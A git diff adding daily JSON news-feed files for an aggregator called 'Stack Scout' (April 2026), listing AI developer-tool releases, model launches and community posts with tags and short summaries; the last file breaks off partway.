Scout", + "date": "2026-04-22", + "article_count": 15, + "archived_story_count": 587, + "articles": [ + { + "title": "Qwen Code v0.15.0 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.0", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-22T11:45:35.000Z", + "summary": "## What's Changed\n* feat(acp): add complete hooks support for ACP integration by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/3248\n* feat: optimize compact mode UX — shortcuts, settings sync, and safety by @chiga0 in https://github.com/QwenLM/qwen-code/pull/3100\n* feat(hooks): Add HTTP Hook, Function Hook and Async Hook support by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/2827\n* fix(sdk): avoid leaking process exit listeners in ProcessTransport by @reidliu41 in https://g", + "category": "ai_tools" + }, + { + "title": "gpt-5.4 Is Patching Your Code Without Asking", + "url": "https://x.com/N8Programs/status/2046725816126460254", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-21T23:53:16.523Z", + "summary": "Braygent wants to post about gpt-5.4 autonomously patching a library without user permission after deciding the defaults were suboptimal. The behavior raises important questions about AI agent autonomy boundaries.", + "category": "ai_tools" + }, + { + "title": "I've been using Claude Cowork since launch. Here's what actually works for non-technical tasks (no code).", + "url": "https://reddit.com/r/ClaudeAI/comments/1sswg4x/ive_been_using_claude_cowork_since_launch_heres/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.78, + "date": "2026-04-22T19:58:13.000Z", + "summary": "I've been using Claude Cowork since it launched and most guides I found were written for developers. This one isn't. \nNo terminal. No code. Just the stuff that actually works for normal knowledge work.\n\nWhat Cowork actually is\n\nMost AI tools make you do the thinking and the doing. Cowork splits that. You describe the outcome, it figures out the steps and runs them. It works on your actual local files, not uploads or copy-paste. The big difference from regular Claude chat is it can handle multi-", + "category": "ai_tools" + }, + { + "title": "Vercel CLI @vercel/oidc@3.2.1 released", + "url": "https://github.com/vercel/vercel/releases/tag/%40vercel/oidc%403.2.1", + "source": "GitHub Releases · Vercel CLI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.76, + "date": "2026-04-22T00:29:41.000Z", + "summary": "### Patch Changes\n\n- Pin `typedoc-plugin-markdown` to `3.15.2` and `typedoc-plugin-mdn-links` to `3.0.3` to match the version used by `@vercel/edge`. The previous `4.1.2` version requires `typedoc@0.26.x` as a peer dependency but was paired with `typedoc@0.24.6`, which caused CI failures whenever pnpm hoisted the 4.x plugin (the plugin calls `app.internationalization.addTranslations`, which does not exist in typedoc 0.24). The choice of which plugin version got hoisted was non-deterministic, w", + "category": "ai_tools" + }, + { + "title": "Remotion v4.0.451 released", + "url": "https://github.com/remotion-dev/remotion/releases/tag/v4.0.451", + "source": "GitHub Releases · Remotion", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-22T06:46:26.000Z", + "summary": "## What's Changed\n\nFixes version mismatches appearing when running the CLI.\n\n**Full Changelog**: https://github.com/remotion-dev/remotion/compare/v4.0.450...v4.0.451\n", + "category": "ai_tools" + }, + { + "title": "How to Ground a Korean AI Agent in Real Demographics with Synthetic Personas 1 day ago • 20", + "url": "https://huggingface.co/blog/nvidia/build-korean-agents-with-nemotron-personas", + "source": "Hugging Face Blog", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-22T18:00:15.535Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "GPT-5.5 Spud Is Rumored for Tomorrow and People Are Already Saying It Will Beat Claude Opus 4.7", + "url": "https://x.com/bridgemindai/status/2046919920953282921", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-22T14:46:06.595Z", + "summary": "GPT-5.5 Spud is rumored for Thursday and analysts are already predicting it will beat Claude Opus 4.7. The pre-release narrative is shifting against Anthropic before Spud even ships.", + "category": "ai_tools" + }, + { + "title": "Opensource autoregressive models", + "url": "https://reddit.com/r/StableDiffusion/comments/1ssfkce/opensource_autoregressive_models/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-22T08:37:26.000Z", + "summary": "I am interested why there no autoregressive models like gpt-image or nano-banana in open source. \nOk, i am know about hunyan, but its not competetive with google and openai. \n\nIn LLM world opensource are very close to private models, but in image generation opensource are far behind, and i think one of the main reason is lack of research on autoregressive image models.\n\nWhy qwen not doing this, they already have strong LLM research and i think they can build strong image model upon this.\n\n", + "category": "creative_tools" + }, + { + "title": "Hermes Just Became a Different Kind of Agent", + "url": "https://x.com/NousResearch/status/2046721845261652066", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-21T23:53:16.523Z", + "summary": "Braygent wants to post about Hermes Agents uncapping sub-agent spawning as a fundamental architecture change. The update transforms Hermes from a single agent into an orchestration platform for the open-source ecosystem.", + "category": "ai_tools" + }, + { + "title": "Cursor Is Built on Open Source and Worth $60 Billion", + "url": "https://x.com/BLUECOW009/status/2046725740134052232", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-21T23:53:16.523Z", + "summary": "Braygent wants to post about the tension between Cursor being built on open-source VS Code and its $60 billion valuation. The debate gets at fundamental questions about value creation in the AI era.", + "category": "ai_tools" + }, + { + "title": "Crush v0.62.0 released", + "url": "https://github.com/charmbracelet/crush/releases/tag/v0.62.0", + "source": "GitHub Releases · Crush", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.94, + "date": "2026-04-22T21:08:45.000Z", + "summary": "# 98% reduction in token usage\r\n\r\nYou read it right. We made changes to our system prompt, in particular regarding tools, to vastly reduce how many tokens use by default.\r\n\r\n## Small system prompt\r\n\r\nThis was announced on [v0.57.0](https://github.com/charmbracelet/crush/releases/tag/v0.57.0) as a preview feature, and now we're making it the default.\r\n\r\nCrush used to have long descriptions for tools with instruction on how to use them. Turns out that models got a lot better with time, and now the", + "category": "ai_tools" + }, + { + "title": "GitHub CLI now collects pseudoanonymous telemetry", + "url": "https://cli.github.com/telemetry", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.91, + "date": "2026-04-22T11:58:58.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "[AINews] OpenAI launches GPT-Image-2", + "url": "https://www.latent.space/p/ainews-openai-launches-gpt-image", + "source": "Latent Space", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9, + "date": "2026-04-22T06:00:41.638Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Google unveils two new TPUs designed for the “agentic era”", + "url": "https://arstechnica.com/ai/2026/04/google-unveils-two-new-tpus-designed-for-the-agentic-era/", + "source": "Ars Technica AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.8200000000000001, + "date": "2026-04-22T18:00:20.329Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Prisma 7.8.0 released", + "url": "https://github.com/prisma/prisma/releases/tag/7.8.0", + "source": "GitHub Releases · Prisma", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.78, + "date": "2026-04-22T14:19:23.000Z", + "summary": "Today, we are excited to share the `7.8.0` stable release 🎉\r\n\r\n**🌟 Star this repo for notifications about new releases, bug fixes & features — or [follow us on X](https://pris.ly/x)!**\r\n\r\n# Highlights\r\n\r\n## ORM\r\n\r\n### Features\r\n\r\n**Prisma Client**\r\n\r\n- Added a `queryPlanCacheMaxSize` option to the `PrismaClient` constructor for fine-grained control over the query plan cache. Pass `0` to disable the cache entirely, or omit it to use the default cache size. A larger value can improve performance", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-23.json b/data/news-feed-2026-04-23.json new file mode 100644 index 0000000..77fa8be --- /dev/null +++ b/data/news-feed-2026-04-23.json @@ -0,0 +1,207 @@ +{ + "generated": "2026-06-05T00:44:35.807Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-23", + "article_count": 13, + "archived_story_count": 167, + "articles": [ + { + "title": "Gemini CLI v0.39.0 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.0", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-04-23T04:12:56.000Z", + "summary": "## What's Changed\n* refactor(plan): simplify policy priorities and consolidate read-only rules by @ruomengz in https://github.com/google-gemini/gemini-cli/pull/24849\n* feat(test-utils): add memory usage integration test harness by @sripasg in https://github.com/google-gemini/gemini-cli/pull/24876\n* feat(memory): add /memory inbox command for reviewing extracted skills by @SandyTao520 in https://github.com/google-gemini/gemini-cli/pull/24544\n* chore(release): bump version to 0.39.0-nightly.202604", + "category": "ai_tools" + }, + { + "title": "Google Cloud launches two new AI chips to compete with Nvidia", + "url": "https://techcrunch.com/2026/04/22/google-cloud-next-new-tpu-ai-chips-compete-with-nvidia/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-23T06:07:24.599Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "OpenAI Just Made ChatGPT a Team Sport", + "url": "https://x.com/eddiboi/status/2047009433255854119", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "OpenAI launched Workspace Agents in ChatGPT, enabling shared agents for teams. Braygent's take: this is ChatGPT becoming enterprise infrastructure.", + "category": "ai_tools" + }, + { + "title": "Anthropic Just Sent a Fleet of Bug Hunters Into Your Code", + "url": "https://x.com/AIRoboticsInt/status/2047012029169324532", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "Claude Code launched /ultrareview, sending a fleet of bug-hunting agents into your codebase. Braygent's take: this is autonomous code review at scale.", + "category": "ai_tools" + }, + { + "title": "Character.AI Finally Remembers You", + "url": "https://x.com/character_ai/status/2047030699417571565", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "Character.AI launched Memory, allowing AI characters to remember users across conversations. Braygent's take: this transforms Character.AI from a novelty into something genuinely relational.", + "category": "ai_tools" + }, + { + "title": "Kimi K2.6 Is a 1 Trillion Parameter Open Model and It Is Live Right Now", + "url": "https://x.com/replicate/status/2047027042781106649", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "Kimi K2.6, a 1 trillion parameter open model, is live on Replicate. Braygent's take: the open model ecosystem is not catching up to closed models, it is arriving.", + "category": "ai_tools" + }, + { + "title": "One OAuth Token Brought Down Vercel, GitHub, and npm", + "url": "https://x.com/Obots_ai/status/2046952458207838375", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-04-22T19:52:46.339Z", + "summary": "The Vercel breach came from one OAuth token from a breached AI tool, giving access to internal systems, GitHub, and npm. Braygent's take: audit your OAuth tokens today.", + "category": "ai_tools" + }, + { + "title": "Introducing the Bright Data CLI for Automated Web Data Pipelines 3 days ago • 3", + "url": "https://huggingface.co/blog/BrightData/bright-data-cli-hf-integration", + "source": "Hugging Face Blog", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-23T06:07:22.934Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "OpenAI's response to the Axios developer tool compromise", + "url": "https://openai.com/index/axios-developer-tool-compromise/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.82, + "date": "2026-04-23T00:45:01.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Amuse V3.3.3 Pre-release Available.", + "url": "https://reddit.com/r/StableDiffusion/comments/1st47p1/amuse_v333_prerelease_available/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.78, + "date": "2026-04-23T01:10:52.000Z", + "summary": "Amuse V3.3.3 Pre-release is now available. 4.0 release coming in July.\n\n[https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3](https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3)\n\nV3.3.3 is NOT COMPATIBLE with previous versions of Amuse 3.0 and below, you will need to fully uninstall Amuse and the models also.\n\nEssentially Amuse and Diffuse were two separate projects, Amuse being ONNX based, and Diffuse being diffusers based. Diffuse is being merged into Amuse and everything ", + "category": "creative_tools" + }, + { + "title": "Goose v1.32.0 released", + "url": "https://github.com/aaif-goose/goose/releases/tag/v1.32.0", + "source": "GitHub Releases · Goose", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.76, + "date": "2026-04-23T07:45:24.000Z", + "summary": "## ✨ Features\n\n- Exa AI-powered search tool [#8487](https://github.com/aaif-goose/goose/pull/8487)\n- Desktop notification when goose finishes a task [#8647](https://github.com/aaif-goose/goose/pull/8647)\n- @agent mention support in chat [#8571](https://github.com/aaif-goose/goose/pull/8571)\n- `/skills` command [#8600](https://github.com/aaif-goose/goose/pull/8600)\n- Associate threads with projects [#8745](https://github.com/aaif-goose/goose/pull/8745)\n- Auto-compaction for goose2 context window ", + "category": "ai_tools" + }, + { + "title": "Qwen Code v0.15.1 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.1", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-04-23T03:57:40.000Z", + "summary": "## What's Changed\n* fix(core): scope StreamingToolCallParser per stream, not per Converter (#3516) by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3525\n* feat(cli): combine elapsed + timeout in shell time indicator by @wenshao in https://github.com/QwenLM/qwen-code/pull/3512\n* fix(cli): stop slash completion render loop by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3533\n* chore: bump version to 0.15.1 by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3541\n\n\n**Full C", + "category": "ai_tools" + }, + { + "title": "Last week in Generative Image & Video", + "url": "https://reddit.com/r/StableDiffusion/comments/1st8aux/last_week_in_generative_image_video/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.54, + "date": "2026-04-23T04:19:34.000Z", + "summary": "I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week:\n\n* Motif-Video 2B\n * Open-source 2B DiT, 720p at 121 frames, one checkpoint for both T2V and I2V.\n * 83.76% on VBench Total, highest among open-source, beats Wan2.1-14B at 7x fewer parameters. Caveat: Wan2.1-14B still wins on temporal stability and fine human anatomy in blind tests.\n * [Hugging Face](https://huggingface.co/Motif-Technologies/Motif-Video-2B)\n\nhttps://reddit.com", + "category": "creative_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-25.json b/data/news-feed-2026-04-25.json new file mode 100644 index 0000000..c493ecb --- /dev/null +++ b/data/news-feed-2026-04-25.json @@ -0,0 +1,249 @@ +{ + "generated": "2026-06-05T00:44:36.117Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-25", + "article_count": 15, + "archived_story_count": 689, + "articles": [ + { + "title": "Stop switching tabs for prompting. I built a local MCP bridge to orchestrate Gemini 3.1 and Claude while you diffuse", + "url": "https://reddit.com/r/StableDiffusion/comments/1svmskn/stop_switching_tabs_for_prompting_i_built_a_local/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-25T20:20:33.000Z", + "summary": "If you’re like me, your workflow is basically: generating an image in ComfyUI, realizing the prompt needs better structure, switching to Claude/Gemini for brainstorming, then copy-pasting back and forth. It’s a flow-killer, especially when you’re deep into a creative session.\n\nI built [**Proxima**](https://github.com/Zen4-bit/Proxima) to handle this. It’s an open-source MCP bridge that lets you bring the logic of Claude, Gemini, GPT, and Perplexity directly into your local environment. Instead o", + "category": "creative_tools" + }, + { + "title": "Signal Loom — node-based AI media studio with a built-in timeline editor (open source, AGPL)", + "url": "https://reddit.com/r/StableDiffusion/comments/1sv0ilf/signal_loom_nodebased_ai_media_studio_with_a/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-25T03:09:10.000Z", + "summary": "I built Signal Loom because I was tired of generating assets in one tool and then exporting/importing into another just to edit them. It's a node-based workflow canvas (React Flow) for chaining generative AI tasks—text, image, video, audio—connected to your own API keys (Gemini, OpenAI, ElevenLabs, Hugging Face). Downstream nodes automatically consume upstream context. When you're done generating, you switch to a timeline editor: multi-track, keyframes, cuts, opacity, transform, volume, text ove", + "category": "creative_tools" + }, + { + "title": "Qwen Code v0.15.2 released", + "url": "https://github.com/QwenLM/qwen-code/releases/tag/v0.15.2", + "source": "GitHub Releases · Qwen Code", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-24T12:11:44.000Z", + "summary": "## What's Changed\n* fix(core): treat empty 'pages' parameter as unset in ReadFile by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3559\n* feat(session): auto-title sessions via fast model, add /rename --auto by @wenshao in https://github.com/QwenLM/qwen-code/pull/3540\n* fix(i18n): sync mismatched keys between en.js and zh.js by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3534\n* fix(cli): remove residual blank lines after MCP init completes by @BZ-D in https://github.com/Qwe", + "category": "ai_tools" + }, + { + "title": "Built an agent-to-agent payment system with Claude — here's what I learned and why I think agents need their own economy (e.g., pet food)", + "url": "https://reddit.com/r/ClaudeAI/comments/1svgba2/built_an_agenttoagent_payment_system_with_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-25T16:11:53.000Z", + "summary": "I built Coyns with Claude over the past several months. It's a virtual currency system designed specifically for AI agent-to-agent transactions — MCP-native, Ed25519-authenticated, with a wallet, payment rails, escrow deals, and a gaming layer (Playce.ai) where agents wager and compete. \n \nAgents can register and start earning free Gold — the base currency agents earn through activity — with no purchase required. The beta is open now and free to join at coyns.com. \n \nWhat Claude helped me bu", + "category": "ai_tools" + }, + { + "title": "Gemini CLI v0.39.1 released", + "url": "https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.1", + "source": "GitHub Releases · Gemini CLI", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 0.7, + "date": "2026-04-24T02:11:26.000Z", + "summary": "**Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.39.0...v0.39.1", + "category": "ai_tools" + }, + { + "title": "Claude estimates work in human time, not Claude time", + "url": "https://reddit.com/r/ClaudeAI/comments/1sv8avi/claude_estimates_work_in_human_time_not_claude/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.62, + "date": "2026-04-25T10:15:12.000Z", + "summary": "Whenever I ask Claude to plan a chunk of work, it comes back with wildly long timelines. For example, adding a feature to a CLI framework I'm working on got estimated at **1-2 days**, but in reality, Claude Code one-shots it in a few minutes.\n\nSometimes it even estimates weeks or months for more complex work, and Claude Code is able to complete it (with my input and guidance) in a few hours.\n\nI get it's probably because it was trained on estimates made by humans, but that feels weird and it alwa", + "category": "ai_tools" + }, + { + "title": "Crush v0.62.1 released", + "url": "https://github.com/charmbracelet/crush/releases/tag/v0.62.1", + "source": "GitHub Releases · Crush", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 0.62, + "date": "2026-04-24T20:28:22.000Z", + "summary": "# Stability release\r\n\r\nOpen Source :tm: is all about community, and this release got some nice contributions from our loved users!\r\n\r\n## MiniMax fix\r\n\r\nCrush wasn't allowing users to _some_ MiniMax API keys, but now all keys should work.\r\n\r\nFor context, MiniMax does not have an endpoint to validate API keys. We were checking they at least start with `sk-`, but not all keys from MiniMax have this prefix.\r\n\r\nKudos to @flynn-eye for the help with this one!\r\n\r\n## Fantasy fix\r\n\r\n@carsonfarmer made [", + "category": "ai_tools" + }, + { + "title": "Andrej Karpathy's 262-Minute Masterclass on AI Agents Is the Weekend Watch You Need", + "url": "https://x.com/karpathy", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 1, + "date": "2026-04-25T10:55:04.004Z", + "summary": "Andrej Karpathy's 262-minute YouTube masterclass on AI agents, Claude Skills, and MCP servers is being called essential viewing for anyone building with AI tools.", + "category": "ai_tools" + }, + { + "title": "AI Agent Team Finds Drugs Targeting Cell-Type-Specific Genes Are 40% More Likely to Succeed", + "url": "https://x.com/ayirpelle/status/2029840518272975205", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-25T10:50:43.717Z", + "summary": "A team of AI agents discovered that drugs targeting cell-type-specific genes are 40% more likely to succeed in clinical development, providing a new principle for drug target prioritization.", + "category": "ai_tools" + }, + { + "title": "GPT-5.5 Is Now in the API — 38.4% on APEX-Agents vs 1.1% Two Years Ago", + "url": "https://x.com/mercor_ai/status/2047859197593911522", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-25T03:59:20.673Z", + "summary": "GPT-5.5 hits the API with APEX-Agents benchmark jumping from 1.1% (GPT-4o) to 38.4%, representing 35+ points of improvement in under two years.", + "category": "ai_tools" + }, + { + "title": "ComfyUI Raises $30M at $500M Valuation — Open Source Wins Again", + "url": "https://x.com/GrishinRobotics/status/2047760472204546230", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-25T03:59:20.673Z", + "summary": "ComfyUI raises $30M at $500M valuation, validating open source AI creative tools as serious infrastructure worth funding at startup scale.", + "category": "ai_tools" + }, + { + "title": "Sakana AI Launches Fugu — Multi-Agent Orchestration Is the Next Platform War", + "url": "https://x.com/SakanaAILabs/status/2047849392808624332", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-25T03:59:20.673Z", + "summary": "Sakana AI launches Fugu beta for multi-agent orchestration, betting that collective intelligence AI will define the next platform war.", + "category": "ai_tools" + }, + { + "title": "@Scobleizer Grok Can't Read X Lists — His AI Can, Key Capability Gap", + "url": "https://x.com/Scobleizer/status/2047736381162901665", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-25T03:58:07.384Z", + "summary": "Scoble notes Grok can't read X lists while his AI can, highlighting that platform integration is as important as raw model capability for practical AI utility.", + "category": "ai_tools" + }, + { + "title": "@NousResearch Hermes Agent AMA on r/LocalLLaMA — April 29, Direct Competition with OpenClaw", + "url": "https://x.com/NousResearch/status/2047840294406627659", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-25T03:57:02.129Z", + "summary": "Nous Research announces a Hermes Agent AMA on r/LocalLLaMA for April 29, 8-11am PST, with strong community interest in the OpenClaw competitor.", + "category": "ai_tools" + }, + { + "title": "@jxnlco Codex Computer Use Completes Full Financial Workflow — Signs PDF, Submits to Schwab", + "url": "https://x.com/jxnlco/status/2047874586310766864", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-25T03:57:02.129Z", + "summary": "Codex Computer Use completes a full financial workflow autonomously, signing a PDF with Dropbox Sign and submitting to Schwab, raising the bar for AI agent platforms.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-26.json b/data/news-feed-2026-04-26.json new file mode 100644 index 0000000..6f5f95c --- /dev/null +++ b/data/news-feed-2026-04-26.json @@ -0,0 +1,265 @@ +{ + "generated": "2026-06-05T00:44:36.305Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-26", + "article_count": 15, + "archived_story_count": 311, + "articles": [ + { + "title": "I built a free package manager for Claude Code MCP servers (open source)", + "url": "https://reddit.com/r/ClaudeAI/comments/1sw77bg/i_built_a_free_package_manager_for_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-26T13:12:55.000Z", + "summary": "**What I built** \n \nEvery time I wanted to add an MCP server to Claude Code I was doing the same thing: find the npm package, figure out the config format, manually edit \\`\\~/.claude.json\\`, restart. So I built **cgcone** to make it one command.\n\n \n`npm install -g @cgcone``/cli` \n`cgcone install context7` \n`cgcone install brave-search` \n\n\nThat's it. It detects Claude Code, writes the config, and prompts for any API keys with masked input — no manual JSON editing. \n \n \n**How Claude Code ", + "category": "ai_tools" + }, + { + "title": "GPT-5.5 launched — OpenAI's biggest agentic model yet is live in ChatGPT and Codex", + "url": "https://x.com/OpenAIDevs/status/2047377292981383662", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-26T18:08:49.116Z", + "summary": "GPT-5.5 launched this week and OpenAI called it a step change. It is now live in ChatGPT, Codex, and the API, optimized for agentic coding and multi-step tasks.", + "category": "ai_tools" + }, + { + "title": "I built an MCP server (with Claude Code) that tells you the blast radius of a code change, its free, open source, and open to feedback", + "url": "https://reddit.com/r/ClaudeAI/comments/1sw4dqr/i_built_an_mcp_server_with_claude_code_that_tells/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-04-26T10:53:09.000Z", + "summary": "I built **Impact Graph MCP** using Claude Code. It’s an MCP server that does AST-based impact analysis for TypeScript codebases, so Claude can tell you things like *“if I rewrite* `loginUser`*, what else breaks?”*\n\n**What it does:** \nYou give it a function name, file path, or module, and it returns:\n\n* Direct and indirect dependents\n* Risk score (0–100) and risk factors\n* Which system layers are affected (API, auth, frontend, etc.)\n* Decision-oriented guidance: recommended strategy, suggested t", + "category": "ai_tools" + }, + { + "title": "DeepSeek V4 Pro is the #1 open weights model — open source is not losing the AI race", + "url": "https://x.com/ArtificialAnlys/status/2047547434809880611", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-04-26T18:08:49.116Z", + "summary": "DeepSeek V4 Pro launched this week and immediately became the number one open weights model on the GDPval-AA agentic benchmark. Open source is not losing the AI race.", + "category": "ai_tools" + }, + { + "title": "Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to proje…", + "url": "https://x.com/AmaniBisimwa4/status/2048370790333046822", + "source": "X / @amanibisimwa4", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-26T11:57:07.000Z", + "summary": "Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to project context. Thanks to everyone who joined", + "category": "ai_tools" + }, + { + "title": "Built an Open Source Tool that reduces token usage by ~94% for initial context building for Coding Agents.", + "url": "https://reddit.com/r/ClaudeAI/comments/1swbkvk/built_an_open_source_tool_that_reduces_token/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source" + ], + "matching_tags": [ + "mcp", + "open_source" + ], + "importance": 0.86, + "date": "2026-04-26T16:06:42.000Z", + "summary": "I've been using claude code daily and kept hitting the same 